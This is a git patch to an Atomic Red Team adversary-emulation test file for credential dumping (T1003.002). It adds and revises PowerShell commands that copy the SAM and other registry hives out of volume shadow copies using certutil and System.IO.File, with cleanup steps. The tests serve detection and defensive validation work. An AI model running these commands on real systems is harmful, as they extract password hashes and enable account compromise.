From ddeb15ae41913d66c6b104c0807ee4a5e7d1ed8c Mon Sep 17 00:00:00 2001 From: Brandon Morgan Date: Mon, 9 Aug 2021 11:07:00 -0500 Subject: [PATCH] Update T1003.002.yaml (#1595) Added test 6 to dump hives with System.IO.File. Also tweaked test 5 so that the hive could be selected by the user, same as in test 6 --- atomics/T1003.002/T1003.002.yaml | 52 +++++++++++++++++++++++++++----- 1 file changed, 45 insertions(+), 7 deletions(-) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index d2efab7b..db4530ac 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -99,19 +99,23 @@ atomic_tests: name: powershell elevation_required: true -- name: dump volume shadow copy hive with certutil +- name: dump volume shadow copy hives with certutil auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7 description: | - Dump the SAM hive from volume shadow copies with the certutil utility + Dump hives from volume shadow copies with the certutil utility This can be done with a non-admin user account supported_platforms: - windows input_arguments: - file_path: + dump_path: description: Path where the hive will be dumped type: Path default: $ENV:temp - file_name: + target_hive: + description: Hive you wish to dump + type: String + default: SAM + dumped_hive: description: Name of the dumped hive type: String default: myhive @@ -121,11 +125,45 @@ atomic_tests: $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] - $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM" - certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2 + $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}" + certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2 name: powershell elevation_required: false cleanup_command: | write-host "" - $toremove = #{file_path} + "\" + '#{file_name}' + $toremove = #{dump_path} + "\" + '#{dumped_hive}' rm $toremove + +- name: dump volume shadow copy hives with System.IO.File + description: | + Dump hives from volume shadow copies with System.IO.File + supported_platforms: + - windows + input_arguments: + dump_path: + description: Path where the hive will be dumped + type: Path + default: $ENV:temp + target_hive: + description: Hive you wish to dump + type: String + default: SAM + dumped_hive: + description: Name of the dumped hive + type: String + default: myhive + executor: + command: | + write-host "" + $shadowlist = get-wmiobject win32_shadowcopy + $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} + $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] + $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}" + $mydump = #{dump_path} + '\' + '#{dumped_hive}' + [System.IO.File]::Copy($shadowpath , $mydump) + name: powershell + elevation_required: false + cleanup_command: | + write-host "" + $toremove = #{dump_path} + "\" + '#{dumped_hive}' + rm $toremove \ No newline at end of file